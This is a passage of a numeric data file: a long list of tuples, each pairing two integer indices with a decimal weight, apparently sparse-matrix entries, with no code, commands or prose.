(251, 533, 0.86331),
(174, 1093, 0.23331),
(242, 1093, 0.23331),
(243, 1093, 0.23331),
(248, 1093, 0.23331),
(249, 1093, 0.23331),
(252, 1093, 0.23331),
(256, 1093, 0.23331),
(261, 1093, 0.23331),
(267, 1093, 0.23331),
(268, 1093, 0.23331),
(290, 1093, 0.23331),
(305, 1093, 0.23331),
(306, 1093, 0.23331),
(159, 1093, 0.46662),
(160, 1093, 0.46662),
(258, 1093, 0.46662),
(265, 1093, 0.46662),
(266, 1093, 0.46662),
(240, 1093, 0.69993),
(159, 1094, 0.95669),
(160, 1094, 0.95669),
(305, 1094, 0.95669),
(159, 1095, 1.16669),
(160, 1095, 1.16669),
(159, 1096, 0.88669),
(160, 1096, 0.88669),
(248, 1096, 0.88669),
(159, 1097, 1.07331),
(160, 1097, 1.07331),
(305, 1098, 0.01169),
(304, 1098, 0.04676),
(299, 1098, 0.05845),
(159, 1098, 0.09331),
(160, 1098, 0.09331),
(161, 1098, 0.09331),
(168, 1098, 0.09331),
(174, 1098, 0.09331),
(193, 1098, 0.09331),
(237, 1098, 0.09331),
(238, 1098, 0.09331),
(239, 1098, 0.09331),
(247, 1098, 0.09331),
(253, 1098, 0.09331),
(255, 1098, 0.09331),
(263, 1098, 0.09331),
(265, 1098, 0.09331),
(266, 1098, 0.09331),
(292, 1098, 0.09331),
(306, 1098, 0.09331),
(242, 1098, 0.18662),
(243, 1098, 0.18662),
(246, 1098, 0.18662),
(248, 1098, 0.18662),
(254, 1098, 0.18662),
(268, 1098, 0.18662),
(269, 1098, 0.18662),
(240, 1098, 0.27993),
(241, 1098, 0.27993),
(267, 1098, 0.55986),
(178, 1098, 0.65317),
(159, 1099, 0.88669),
(160, 1099, 0.88669),
(159, 1100, 1.14331),
(160, 1100, 1.14331),
(159, 1101, 0.91),
(160, 1101, 0.91),
(159, 1102, 0.98),
(160, 1102, 0.98),
(159, 1103, 0.91),
(160, 1103, 0.91),
(159, 1104, 0.98),
(160, 1104, 0.98),
(161, 1567, 0.23331),
(174, 1567, 0.23331),
(262, 1567, 0.23331),
(299, 1567, 0.23331),
(240, 1567, 0.46662),
(264, 1567, 0.93324),
(161, 1744, 0.81669),
(178, 1744, 0.81669),
(193, 1744, 0.81669),
(239, 1744, 0.81669),
(240, 1744, 0.81669),
(248, 1744, 0.81669),
(262, 1744, 0.81669),
(263, 1744, 0.81669),
(270, 1744, 0.81669),
(290, 1744, 0.81669),
(301, 1744, 0.81669),
(161, 1746, 0.18669),
(245, 1746, 0.18669),
(249, 1746, 0.18669),
(241, 1746, 0.37338),
(268, 1746, 0.37338),
(236, 1749, 0.23331),
(252, 1749, 0.23331),
(263, 1749, 0.23331),
(306, 1749, 0.23331),
(161, 1749, 0.46662),
(239, 13035, 0.18669),
(241, 13035, 0.18669),
(242, 13035, 0.18669),
(244, 13035, 0.18669),
(245, 13035, 0.18669),
(247, 13035, 0.18669),
(248, 13035, 0.18669),
(252, 13035, 0.18669),
(253, 13035, 0.18669),
(263, 13035, 0.18669),
(273, 13035, 0.18669),
(288, 13035, 0.18669),
(295, 13035, 0.18669),
(305, 13035, 0.18669),
(256, 13035, 0.37338),
(299, 13035, 0.37338),
(193, 13035, 0.56007),
(243, 13035, 0.56007),
(270, 13035, 0.74676),
(301, 13035, 0.74676),
(178, 13035, 1.68021),
(174, 13036, 0.18669),
(238, 13036, 0.18669),
(241, 13036, 0.18669),
(263, 13036, 0.18669),
(264, 13036, 0.18669),
(270, 13036, 0.18669),
(274, 13036, 0.18669),
(288, 13036, 0.18669),
(290, 13036, 0.18669),
(292, 13036, 0.18669),
(301, 13036, 0.18669),
(305, 13036, 0.18669),
(306, 13036, 0.18669),
(193, 13036, 0.37338),
(262, 13036, 0.37338),
(242, 13036, 0.56007),
(254, 13036, 0.56007),
(299, 13036, 0.56007),
(304, 13036, 0.74676),
(240, 13036, 0.93345),
(252, 13036, 1.12014),
(252, 13041, 0.86331),
(299, 13041, 0.86331),
(241, 13043, 0.86331),
(252, 13043, 0.86331),
(263, 13043, 0.86331),
(264, 13043, 0.86331),
(270, 13043, 0.86331),
(274, 13043, 0.86331),
(290, 13043, 0.86331),
(292, 13043, 0.86331),
(301, 13043, 0.86331),
(304, 13043, 0.86331),
(193, 13043, 1.72662),
(254, 13043, 1.72662),
(262, 13043, 1.72662),
(299, 13043, 1.72662),
(240, 13043, 2.58993),
(242, 13043, 2.58993),
(299, 13051, 0.035),
(235, 13051, 0.14),
(238, 13051, 0.14),
(246, 13051, 0.14),
(252, 13051, 0.14),
(253, 13051, 0.14),
(263, 13051, 0.14),
(292, 13051, 0.14),
(258, 13051, 0.56),
(239, 13051, 0.7),
(256, 13051, 1.4),
(252, 13052, 0.88669),
(253, 13052, 0.88669),
(235, 13054, 0.81669),
(240, 13054, 0.81669),
(252, 13054, 0.81669),
(255, 13054, 0.81669),
(305, 13054, 0.81669),
(269, 13054, 1.63338),
(233, 13060, 0.14),
(235, 13060, 0.14),
(244, 13060, 0.14),
(246, 13060, 0.14),
(248, 13060, 0.14),
(259, 13060, 0.14),
(260, 13060, 0.14),
(263, 13060, 0.14),
(274, 13060, 0.14),
(288, 13060, 0.14),
(290, 13060, 0.14),
(292, 13060, 0.14),
(299, 13060, 0.14),
(304, 13060, 0.14),
(306, 13060, 0.14),
(239, 13060, 0.28),
(240, 13060, 0.28),
(241, 13060, 0.28),
(242, 13060, 0.28),
(255, 13060, 0.28),
(269, 13060, 0.28),
(252, 13060, 0.42),
(233, 13061, 0.86331),
(239, 13061, 0.86331),
(252, 13061, 0.86331),
(252, 13065, 0.88669),
(255, 13065, 0.88669),
(252, 13359, 0.84),
(256, 13359, 0.84),
(258, 13359, 0.84),
(269, 13359, 0.84),
(239, 13361, 0.81669),
(252, 13361, 0.81669),
(252, 13363, 0.86331),
(269, 13363, 0.86331),
(252, 13367, 0.93331),
(263, 13367, 0.93331),
(178, 21292, 0.46669),
(233, 21292, 0.46669),
(235, 21292, 0.93338),
(233, 21295, 1.05),
(237, 21295, 1.05),
(262, 21295, 1.05),
(275, 21295, 1.05),
(306, 21295, 2.1),
(233, 21296, 1.14331),
(237, 21296, 1.14331),
(301, 21297, 0.02331),
(178, 21297, 0.18669),
(233, 21297, 0.18669),
(239, 21297, 0.18669),
(249, 21297, 0.18669),
(255, 21297, 0.18669),
(269, 21297, 0.18669),
(270, 21297, 0.18669),
(288, 21297, 0.18669),
(306, 21297, 0.18669),
(254, 21297, 0.37338),
(262, 21297, 0.37338),
(193, 21297, 0.74676),
(247, 23734, 0.91),
(263, 23734, 0.91),
(273, 23734, 0.91),
(299, 23734, 0.91),
(193, 23735, 0.86331),
(241, 23735, 0.86331),
(245, 23735, 0.86331),
(256, 23735, 0.86331),
(270, 23735, 0.86331),
(299, 23735, 0.86331),
(301, 23735, 0.86331),
(243, 23735, 1.72662),
(241, 23736, 1.00331),
(245, 23736, 1.00331),
(256, 23736, 1.00331),
(299, 23736, 1.00331),
(243, 23736, 2.00662),
(274, 23738, 1.02669),
(299, 23738, 1.02669),
(193, 23739, 0.98),
(299, 23739, 0.98),
(174, 23740, 0.88669),
(299, 23740, 0.88669),
(246, 23742, 0.98),
(299, 23742, 0.98),
(239, 23749, 0.18669),
(299, 23749, 0.18669),
(275, 23764, 0.84),
(290, 23764, 0.84),
(299, 23764, 0.84),
(305, 23764, 0.84),
(240, 23892, 0.37331),
(274, 23892, 0.37331),
(299, 23892, 0.74662),
(235, 23897, 0.42),
(243, 23897, 0.42),
(299, 23897, 0.84),
(235, 23898, 1.02669),
(299, 23898, 2.05338),
(235, 24278, 0.32669),
(299, 24278, 0.32669),
(168, 24281, 0.18669),
(236, 24281, 0.18669),
(238, 24281, 0.18669),
(243, 24281, 0.18669),
(255, 24281, 0.18669),
(305, 24281, 0.18669),
(241, 24281, 0.37338),
(256, 24281, 0.37338),
(274, 24281, 0.37338),
(299, 24281, 0.37338),
(178, 24281, 1.30683),
(244, 24281, 1.30683),
(242, 25223, 0.37331),
(255, 25223, 0.37331),
(265, 25223, 0.37331),
(266, 25223, 0.37331),
(298, 25223, 0.37331),
(308, 25223, 0.37331),
(268, 25223, 1.11993),
(304, 25223, 1.11993),
(259, 25223, 1.49324),
(260, 25223, 1.49324),
(174, 25223, 1.86655),
(255, 25224, 1.07331),
(308, 25224, 1.07331),
(304, 25224, 3.21993),
(237, 25232, 0.18669),
(242, 25232, 0.18669),
(256, 25232, 0.18669),
(264, 25232, 0.18669),
(268, 25232, 0.18669),
(298, 25232, 0.18669),
(305, 25232, 0.18669),
(308, 25232, 0.18669),
(268, 25233, 0.91),
(298, 25233, 0.91),
(308, 25233, 0.91),
(298, 25453, 0.02919),
(240, 25453, 0.23331),
(242, 25453, 0.23331),
(244, 25453, 0.23331),
(261, 25453, 0.23331),
(268, 25453, 0.23331),
(274, 25453, 0.23331),
(275, 25453, 0.23331),
(308, 25453, 0.23331),
(273, 25453, 0.46662),
(255, 25453, 0.69993),
(298, 25456, 0.0175),
(168, 25456, 0.14),
(238, 25456, 0.14),
(240, 25456, 0.14),
(248, 25456, 0.14),
(263, 25456, 0.14),
(308, 25456, 0.14),
(269, 25456, 0.28),
(306, 25456, 0.28),
(242, 25456, 0.56),
(193, 25996, 0.32669),
(274, 25996, 0.65338),
(46, 25996, 0.79339),
(239, 25996, 0.98007),
(46, 25997, 2.43661),
(46, 25998, 2.94661),
(193, 28619, 0.23331),
(238, 28619, 0.23331),
(253, 28619, 0.23331),
(270, 28619, 0.23331),
(301, 28619, 0.23331),
(254, 28619, 0.46662),
(254, 32928, 0.91),
(269, 32928, 0.91),
(193, 32928, 1.82),
(236, 36797, 0.18669),
(237, 36797, 0.18669),
(241, 36797, 0.18669),
(244, 36797, 0.18669),
(249, 36797, 0.18669),
(253, 36797, 0.18669),
(254, 36797, 0.18669),
(256, 36797, 0.18669),
(257, 36797, 0.18669),
(259, 36797, 0.18669),
(260, 36797, 0.18669),
(261, 36797, 0.18669),
(262, 36797, 0.18669),
(263, 36797, 0.18669),
(264, 36797, 0.18669),
(265, 36797, 0.18669),
(266, 36797, 0.18669),
(267, 36797, 0.18669),
(268, 36797, 0.18669),
(269, 36797, 0.18669),
(270, 36797, 0.18669),
(272, 36797, 0.18669),
(273, 36797, 0.18669),
(274, 36797, 0.18669),
(275, 36797, 0.18669),
(280, 36797, 0.18669),
(288, 36797, 0.18669),
(301, 36797, 0.18669),
(304, 36797, 0.18669),
(305, 36797, 0.18669),
(242, 36797, 0.37338),
(255, 36797, 0.37338),
(258, 36797, 0.37338),
(292, 36797, 0.37338),
(246, 36800, 0.91),
(248, 36800, 0.91),
(253, 36800, 0.91),
(263, 36800, 0.91),
(265, 36800, 0.91),
(266, 36800, 0.91),
(267, 36800, 0.91),
(240, 36800, 1.82),
(248, 36801, 1.00331),
(253, 36801, 1.00331),
(263, 36801, 1.00331),
(238, 51219, 0.93331),
(235, 51219, 2.79993),
(235, 51221, 0.93331),
(242, 51221, 0.93331),
(178, 51526, 0.86331),
(235, 51526, 0.86331),
(178, 51527, 0.95669),
(235, 51527, 0.95669),
(193, 65027, 0.32669),
(241, 65027, 0.32669),
(193, 65035, 0.93331),
(240, 65035, 0.93331),
(262, 65035, 1.86662),
(193, 65041, 0.91),
(237, 65041, 0.91),
(193, 65051, 0.93331),
(238, 65051, 0.93331),
(193, 65055, 0.86331),
(261, 65055, 0.86331),
(193, 65240, 0.32669),
(242, 65240, 0.32669),
(287, 65240, 0.32669),
(193, 65616, 0.60669),
(238, 65616, 0.60669),
(255, 65616, 0.60669),
(263, 65616, 0.60669),
(240, 65616, 1.82007),
(239, 65616, 2.42676),
(193, 65617, 1.07331),
(263, 65617, 1.07331),
(239, 65617, 2.14662),
(255, 65620, 0.86331),
(267, 65620, 0.86331),
(272, 65620, 0.86331),
(280, 65620, 0.86331),
(193, 65620, 1.72662),
(262, 65620, 1.72662),
(270, 65620, 2.58993),
(301, 65620, 2.58993),
(178, 65624, 0.88669),
(193, 65624, 0.88669),
(239, 65624, 0.88669),
(237, 68702, 0.91),
(241, 68702, 0.91),
(244, 68702, 0.91),
(254, 68702, 0.91),
(255, 68702, 0.91),
(256, 68702, 0.91),
(257, 68702, 0.91),
(258, 68702, 0.91),
(259, 68702, 0.91),
(260, 68702, 0.91),
(261, 68702, 0.91),
(262, 68702, 0.91),
(263, 68702, 0.91),
(264, 68702, 0.91),
(265, 68702, 0.91),
(266, 68702, 0.91),
(267, 68702, 0.91),
(268, 68702, 0.91),
(269, 68702, 0.91),
(270, 68702, 0.91),
(272, 68702, 0.91),
(273, 68702, 0.91),
(274, 68702, 0.91),
(275, 68702, 0.91),
(280, 68702, 0.91),
(288, 68702, 0.91),
(292, 68702, 0.91),
(301, 68702, 0.91),
(304, 68702, 0.91),
(305, 68702, 0.91),
(237, 68703, 0.98),
(241, 68703, 0.98),
(254, 68703, 0.98),
(255, 68703, 0.98),
(256, 68703, 0.98),
(257, 68703, 0.98),
(258, 68703, 0.98),
(259, 68703, 0.98),
(260, 68703, 0.98),
(261, 68703, 0.98),
(262, 68703, 0.98),
(263, 68703, 0.98),
(264, 68703, 0.98),
(265, 68703, 0.98),
(266, 68703, 0.98),
(267, 68703, 0.98),
(268, 68703, 0.98),
(270, 68703, 0.98),
(272, 68703, 0.98),
(273, 68703, 0.98),
(274, 68703, 0.98),
(275, 68703, 0.98),
(280, 68703, 0.98),
(288, 68703, 0.98),
(292, 68703, 0.98),
(301, 68703, 0.98),
(304, 68703, 0.98),
(305, 68703, 0.98),
(178, 74556, 0.84),
(237, 74556, 0.84),
(238, 74556, 0.84),
(242, 75844, 0.28),
(254, 75844, 0.28),
(262, 75844, 0.28),
(240, 75849, 0.93331),
(242, 75849, 0.93331),
(254, 75849, 0.93331),
(304, 75849, 0.93331),
(261, 75855, 0.28),
(254, 75855, 0.56),
(238, 75860, 0.84),
(239, 75860, 0.84),
(241, 75860, 0.84),
(247, 75860, 0.84),
(248, 75860, 0.84),
(249, 75860, 0.84),
(254, 75860, 0.84),
(257, 75860, 0.84),
(259, 75860, 0.84),
(260, 75860, 0.84),
(272, 75860, 0.84),
(273, 75860, 0.84),
(275, 75860, 0.84),
(288, 75860, 0.84),
(306, 75860, 0.84),
(280, 75860, 1.68),
(239, 76244, 0.81669),
(254, 76244, 0.81669),
(256, 76244, 0.81669),
(269, 76244, 0.81669),
(239, 76245, 0.91),
(254, 76245, 0.91),
(256, 76245, 0.91),
(238, 82631, 1.09669),
(240, 82631, 1.09669),
(255, 82631, 1.09669),
(237, 84777, 0.32669),
(239, 84777, 0.32669),
(241, 84777, 0.32669),
(268, 84777, 0.32669),
(237, 84784, 0.86331),
(256, 84784, 0.86331),
(305, 84784, 0.86331),
(305, 84967, 0.02919),
(168, 84967, 0.23331),
(249, 84967, 0.23331),
(257, 84967, 0.23331),
(306, 84967, 0.23331),
(237, 84967, 0.46662),
(241, 84967, 0.46662),
(249, 84968, 0.91),
(257, 84968, 0.91),
(305, 84968, 0.91),
(306, 84968, 0.91),
(237, 84968, 1.82),
(237, 84972, 0.28),
(256, 84972, 0.28),
(258, 84972, 0.28),
(237, 84975, 0.81669),
(241, 84975, 0.81669),
(257, 84975, 0.81669),
(258, 84975, 0.81669),
(290, 84975, 0.81669),
(295, 84975, 0.81669),
(306, 84975, 0.81669),
(240, 84975, 1.63338),
(238, 92459, 1.02669),
(270, 92459, 1.02669),
(301, 92459, 1.02669),
(238, 92466, 0.88669),
(240, 92466, 0.88669),
(242, 92466, 0.88669),
(174, 92466, 1.77338),
(238, 92468, 0.88669),
(243, 92468, 0.88669),
(238, 92472, 0.93331),
(242, 92472, 0.93331),
(269, 92472, 0.93331),
(168, 92861, 0.88669),
(238, 92861, 0.88669),
(243, 92861, 0.88669),
(244, 92861, 0.88669),
(305, 92861, 0.88669),
(274, 92861, 1.77338),
(239, 100724, 0.88669),
(270, 100724, 0.88669),
(301, 100724, 0.88669),
(239, 100751, 0.91),
(240, 100751, 0.91),
(241, 100751, 0.91),
(292, 100751, 0.91),
(239, 100752, 1.07331),
(240, 100752, 1.07331),
(239, 100755, 0.95669),
(257, 100755, 0.95669),
(239, 100756, 0.88669),
(268, 100756, 0.88669),
(239, 100762, 0.88669),
(242, 100762, 0.88669),
(239, 101334, 0.91),
(248, 101334, 0.91),
(239, 101338, 0.86331),
(242, 101338, 0.86331),
(259, 101338, 0.86331),
(260, 101338, 0.86331),
(306, 101338, 0.86331),
(240, 102335, 0.91),
(242, 102335, 0.91),
(261, 102335, 0.91),
(275, 102335, 0.91),
(255, 102335, 1.82),
(273, 102335, 1.82),
(178, 102338, 0.86331),
(244, 102338, 0.86331),
(255, 102338, 0.86331),
(256, 102338, 0.86331),
(174, 110395, 0.86331),
(257, 110395, 0.86331),
(257, 110397, 0.88669),
(304, 110397, 0.88669),
(243, 110397, 1.77338),
(258, 115356, 0.95669),
(256, 115356, 1.91338),
(256, 115359, 0.93331),
(258, 115359, 0.93331),
(263, 115363, 0.93331),
(256, 115363, 1.86662),
(256, 115373, 0.88669),
(261, 115373, 0.88669),
(256, 115593, 0.93331),
(258, 115593, 0.93331),
(256, 115594, 1.12),
(258, 115594, 1.12),
(178, 147660, 0.28),
(240, 147660, 0.28),
(248, 147660, 0.28),
(263, 147660, 0.28),
(240, 147683, 1.02669),
(246, 147683, 1.02669),
(265, 147683, 1.02669),
(266, 147683, 1.02669),
(240, 147705, 0.88669),
(269, 147705, 0.88669),
(174, 148263, 0.81669),
(240, 148263, 0.81669),
(240, 148268, 0.32669),
(247, 148268, 0.32669),
(240, 148277, 0.81669),
(265, 148277, 0.81669),
(266, 148277, 0.81669),
(240, 148283, 0.86331),
(248, 148283, 0.86331),
(242, 149952, 0.23331),
(243, 149952, 0.23331),
(242, 150828, 0.37331),
(259, 150828, 0.37331),
(260, 150828, 0.37331),
(178, 157575, 0.23331),
(243, 157575, 0.23331),
(265, 157575, 0.23331),
(266, 157575, 0.23331),
(273, 157575, 0.23331),
(288, 157575, 0.93324),
(243, 157576, 0.88669),
(265, 157576, 0.88669),
(266, 157576, 0.88669),
(243, 157599, 0.28),
(263, 157599, 0.28),
(178, 157599, 0.56),
(259, 157976, 0.81669),
(260, 157976, 0.81669),
(261, 157976, 0.81669),
(288, 157976, 0.81669),
(306, 157976, 0.81669),
(243, 157976, 1.63338),
(247, 159441, 0.86331),
(241, 159441, 1.72662),
(178, 159763, 0.84),
(241, 159763, 0.84),
(245, 159766, 0.86331),
(249, 159766, 0.86331),
(241, 159766, 1.72662),
(268, 159766, 1.72662),
(258, 163695, 0.79331),
(268, 163695, 0.79331),
(258, 163700, 0.84),
(265, 163700, 0.84),
(266, 163700, 0.84),
(249, 169386, 0.93331),
(242, 169386, 1.86662),
(242, 169398, 0.86331),
(261, 169398, 0.86331),
(242, 170241, 1.05),
(273, 170241, 1.05),
(168, 170255, 0.88669),
(242, 170255, 1.77338),
(259, 173643, 4.2),
(260, 173643, 4.2),
(259, 173644, 1.14331),
(260, 173644, 1.14331),
(259, 173645, 1.23669),
(260, 173645, 1.23669),
(259, 173646, 1.19),
(260, 173646, 1.19),
(259, 173647, 1.14331),
(260, 173647, 1.14331),
(259, 173648, 0.98),
(260, 173648, 0.98),
(259, 173649, 0.91),
(260, 173649, 0.91),
(259, 173650, 1.00331),
(260, 173650, 1.00331),
(259, 173651, 0.88669),
(260, 173651, 0.88669),
(259, 173652, 0.98),
(260, 173652, 0.98),
(259, 173653, 0.88669),
(260, 173653, 0.88669),
(275, 173653, 0.88669),
(292, 173653, 0.88669),
(304, 173653, 0.88669),
(306, 173653, 0.88669),
(259, 173654, 0.93331),
(260, 173654, 0.93331),
(259, 173655, 0.91),
(260, 173655, 0.91),
(259, 173656, 1.07331),
(260, 173656, 1.07331),
(259, 173657, 0.88669),
(260, 173657, 0.88669),
(259, 173658, 1.00331),
(260, 173658, 1.00331),
(259, 173883, 1.09669),
(260, 173883, 1.09669),
(259, 173884, 1.26),
(260, 173884, 1.26),
(259, 173885, 0.23331),
(260, 173885, 0.23331),
(270, 173885, 0.23331),
(301, 173885, 0.23331),
(259, 173886, 0.91),
(260, 173886, 0.91),
(259, 173887, 1.14331),
(260, 173887, 1.14331),
(259, 173888, 0.93331),
(260, 173888, 0.93331),
(259, 173889, 0.95669),
(260, 173889, 0.95669),
(174, 175887, 0.91),
(261, 175887, 0.91),
(261, 176101, 1.02669),
(275, 176101, 1.02669),
(168, 176102, 0.84),
(261, 176102, 0.84),
(161, 189644, 0.46669),
(161, 189645, 1.05),
(161, 189646, 1.23669),
(161, 189647, 0.46669),
(161, 189648, 1.23669),
(161, 189649, 1.4),
(161, 189650, 0.91),
(161, 189651, 1.02669),
(161, 189808, 0.09331),
(161, 189809, 0.86331),
(161, 189810, 0.98),
(161, 189811, 0.28),
(161, 189812, 0.98),
(161, 189813, 1.14331),
(161, 189814, 0.91),
(161, 189815, 0.91),
(161, 189816, 1.02669),
(161, 189817, 0.86331),
(161, 189818, 1.00331),
(161, 189819, 0.95669),
(161, 189820, 1.07331),
(193, 191309, 0.84),
(267, 191309, 0.84),
(193, 191317, 0.86331),
(263, 191317, 0.86331),
(246, 192830, 0.81669),
(269, 192830, 0.81669),
(246, 193043, 0.86331),
(249, 193043, 0.86331),
(168, 198061, 0.98),
(168, 198062, 1.05),
(168, 198063, 0.18669),
(168, 198064, 0.98),
(168, 198065, 1.12),
(168, 198162, 0.46669),
(168, 198163, 1.05),
(168, 198164, 1.14331),
(168, 198165, 0.23331),
(168, 198166, 0.91),
(168, 198167, 1.02669),
(168, 198314, 0.86331),
(168, 198315, 1.16669),
(168, 198316, 1.09669),
(168, 198317, 0.95669),
(168, 198318, 1.05),
(174, 215564, 0.09331),
(174, 215565, 0.84),
(174, 215566, 0.93331),
(174, 215567, 0.95669),
(174, 215568, 1.14331),
(174, 215569, 1.00331),
(174, 215570, 4.48),
(174, 215571, 2.47338),
(174, 215572, 2.52),
(174, 215573, 1.05),
(174, 215574, 1.28331),
(174, 215575, 0.91),
(174, 215576, 1.05),
(174, 215577, 0.32669),
(292, 215577, 0.32669),
(174, 215578, 0.98),
(174, 215579, 1.12),
(174, 215580, 0.95669),
(174, 215581, 1.19),
(174, 215582, 0.86331),
(174, 215583, 1.07331),
(174, 215584, 0.95669),
(174, 215585, 1.14331),
(174, 215586, 1.00331),
(174, 215587, 1.12),
(174, 215588, 1.12),
(174, 215589, 0.98),
(174, 215590, 1.05),
(174, 215591, 0.98),
(174, 215592, 0.91),
(174, 215593, 1.00331),
(174, 215594, 0.32669),
(174, 215595, 1.02669),
(174, 215970, 2.05338),
(174, 215971, 1.16669),
(174, 215972, 1.14331),
(174, 215973, 0.93331),
(174, 215974, 1.07331),
(174, 215975, 0.91),
(267, 217893, 1.02669),
(262, 217893, 2.05338),
(178, 222380, 1.00331),
(178, 222381, 1.23669),
(178, 222382, 1.72662),
(178, 222383, 0.91),
(178, 222384, 0.91),
(178, 222385, 1.28331),
(178, 222386, 1.4),
(178, 222387, 0.88669),
(178, 222388, 0.93331),
(178, 222389, 1.91338),
(178, 222390, 2.05338),
(178, 222391, 0.86331),
(178, 222392, 0.95669),
(178, 222393, 0.88669),
(178, 222394, 1.00331),
(178, 222395, 0.56),
(178, 222396, 0.91),
(178, 222397, 0.98),
(178, 222398, 1.00331),
(178, 222399, 1.07331),
(178, 222400, 0.91),
(178, 222401, 1.02669),
(178, 222402, 0.18669),
(178, 222403, 0.88669),
(178, 222404, 0.95669),
(178, 222405, 0.93331),
(178, 222406, 1.05),
(178, 222407, 0.98),
(178, 222408, 1.14331),
(178, 222409, 0.88669),
(178, 222410, 0.95669),
(178, 222411, 1.05),
(178, 222412, 1.14331),
(178, 222413, 1.02669),
(178, 222414, 1.09669),
(178, 222415, 0.88669),
(178, 222416, 0.93331),
(178, 222417, 0.98),
(178, 222418, 1.19),
(178, 222419, 0.88669),
(178, 222420, 1.02669),
(178, 222421, 0.18669),
(178, 222422, 0.86331),
(178, 222423, 1.02669),
(178, 222424, 0.84),
(178, 222425, 1.00331),
(178, 222426, 1.09669),
(178, 222427, 0.84),
(178, 222428, 0.93331),
(178, 222429, 0.88669),
(265, 222429, 0.88669),
(266, 222429, 0.88669),
(178, 222430, 0.95669),
(178, 222431, 0.91),
(178, 222432, 0.98),
(178, 222433, 1.86662),
(178, 222434, 1.05),
(178, 222435, 1.02669),
(178, 222436, 0.98),
(178, 222437, 1.19),
(178, 222438, 0.86331),
(178, 222439, 0.98),
(178, 222440, 0.81669),
(178, 222441, 0.93331),
(178, 222442, 0.88669),
(178, 222443, 0.93331),
(178, 222444, 0.95669),
(178, 222445, 1.02669),
(178, 222446, 1.00331),
(178, 222447, 1.02669),
(178, 222448, 1.77338),
(178, 222449, 1.02669),
(178, 222450, 1.02669),
(178, 222451, 0.88669),
(178, 222452, 0.93331),
(178, 222453, 0.93331),
(178, 222454, 1.02669),
(178, 222455, 0.98),
(178, 222456, 1.12),
(178, 222457, 0.91),
(178, 222458, 1.00331),
(178, 222459, 0.95669),
(178, 222460, 1.05),
(178, 223055, 1.12),
(178, 223056, 1.21331),
(178, 223057, 0.42),
(178, 223058, 1.00331),
(178, 223059, 1.07331),
(178, 223060, 1.77338),
(178, 223061, 2.00662),
(178, 223062, 0.91),
(178, 223063, 0.86331),
(178, 223064, 1.02669),
(178, 223065, 0.98),
(178, 223066, 1.16669),
(178, 223067, 0.95669),
(178, 223068, 1.00331),
(178, 223069, 0.93331),
(178, 223070, 1.05),
(178, 223071, 0.93331),
(178, 223072, 1.09669),
(178, 223073, 0.91),
(263, 227625, 1.02669),
(273, 227625, 1.02669),
(263, 227897, 0.84),
(269, 227897, 1.68),
(248, 233630, 0.84),
(274, 233630, 0.84),
(270, 237000, 0.98),
(272, 237000, 0.98),
(280, 237000, 0.98),
(301, 237000, 0.98),
(193, 239011, 0.23331),
(193, 239012, 0.93331),
(193, 239013, 1.02669),
(193, 239014, 0.88669),
(193, 239015, 0.95669),
(193, 239016, 0.98),
(270, 239016, 0.98),
(301, 239016, 0.98),
(193, 239017, 0.91),
(193, 239018, 1.12),
(193, 239019, 0.93331),
(193, 239020, 1.09669),
(193, 239021, 0.95669),
(193, 239022, 1.05),
(193, 239023, 0.95669),
(193, 239024, 1.02669),
(274, 239025, 0.42),
(193, 239025, 0.84),
(193, 239026, 1.16669),
(193, 239027, 1.26),
(193, 239028, 1.09669),
(193, 239029, 1.14331),
(193, 239030, 0.46669),
(193, 239031, 1.00331),
(193, 239032, 1.09669),
(193, 239033, 1.07331),
(193, 239034, 1.30669),
(193, 239035, 0.98),
(193, 239036, 0.93331),
(193, 239037, 1.05),
(193, 239038, 0.93331),
(193, 239039, 1.05),
(193, 239040, 1.16669),
(193, 239041, 0.86331),
(193, 239042, 0.98),
(193, 239043, 1.00331),
(193, 239044, 0.88669),
(193, 239045, 1.07331),
(193, 239046, 0.95669),
(193, 239047, 1.07331),
(193, 239048, 0.91),
(193, 239049, 1.12),
(193, 239050, 1.02669),
(193, 239051, 1.09669),
(193, 239052, 0.86331),
(193, 239053, 1.00331),
(193, 239054, 0.91),
(193, 239055, 0.98),
(193, 239056, 0.95669),
(193, 239057, 1.05),
(193, 239058, 0.23331),
(193, 239059, 0.91),
(193, 239060, 1.00331),
(193, 239208, 0.91),
(193, 239209, 1.09669),
(193, 239523, 1.12),
(193, 239524, 1.02669),
(193, 239525, 2.14662),
(193, 239526, 0.93331),
(193, 239527, 1.05),
(193, 239528, 1.00331),
(269, 239529, 1.02669),
(193, 239529, 2.05338),
(193, 239530, 0.95669),
(193, 239531, 1.05),
(270, 250591, 1.00331),
(301, 250591, 1.00331),
(270, 250592, 0.88669),
(301, 250592, 0.88669),
(270, 250593, 1.00331),
(301, 250593, 1.00331),
(270, 250594, 0.88669),
(301, 250594, 0.88669),
(270, 250595, 1.00331),
(301, 250595, 1.00331),
(270, 250596, 0.86331),
(301, 250596, 0.86331),
(270, 250597, 0.95669),
(301, 250597, 0.95669),
(270, 250598, 1.00331),
(301, 250598, 1.00331),
(270, 250599, 0.91),
(301, 250599, 0.91),
(270, 250600, 1.07331),
(301, 250600, 1.07331),
(270, 250601, 1.14331),
(301, 250601, 1.14331),
(270, 250602, 0.91),
(301, 250602, 0.91),
(270, 250603, 0.98),
(301, 250603, 0.98),
(270, 250695, 0.91),
(301, 250695, 0.91),
(270, 250696, 1.09669),
(301, 250696, 1.09669),
(270, 250697, 0.51331),
(301, 250697, 0.51331),
(270, 250698, 1.02669),
(301, 250698, 1.02669),
(270, 250699, 1.12),
(301, 250699, 1.12),
(270, 250700, 0.93331),
(301, 250700, 0.93331),
(270, 250701, 1.96),
(301, 250701, 1.96),
(270, 250702, 0.93331),
(301, 250702, 0.93331),
(270, 250703, 1.07331),
(301, 250703, 1.07331),
(265, 251212, 1.14331),
(266, 251212, 1.14331),
(265, 251213, 1.23669),
(266, 251213, 1.23669),
(265, 251214, 0.91),
(266, 251214, 0.91),
(265, 251215, 1.02669),
(266, 251215, 1.02669),
(265, 251216, 0.93331),
(266, 251216, 0.93331),
(265, 251217, 1.07331),
(266, 251217, 1.07331),
(265, 251218, 1.00331),
(266, 251218, 1.00331),
(265, 251361, 0.56),
(266, 251361, 0.56),
(265, 251362, 1.12),
(266, 251362, 1.12),
(265, 251363, 1.21331),
(266, 251363, 1.21331),
(265, 251364, 0.46669),
(266, 251364, 0.46669),
(265, 251365, 1.00331),
(266, 251365, 1.00331),
(265, 251366, 1.09669),
(266, 251366, 1.09669),
(265, 251367, 0.93331),
(266, 251367, 0.93331),
(265, 251368, 1.02669),
(266, 251368, 1.02669),
(265, 251369, 0.86331),
(266, 251369, 0.86331),
(265, 251370, 0.84),
(266, 251370, 0.84),
(265, 251371, 0.93331),
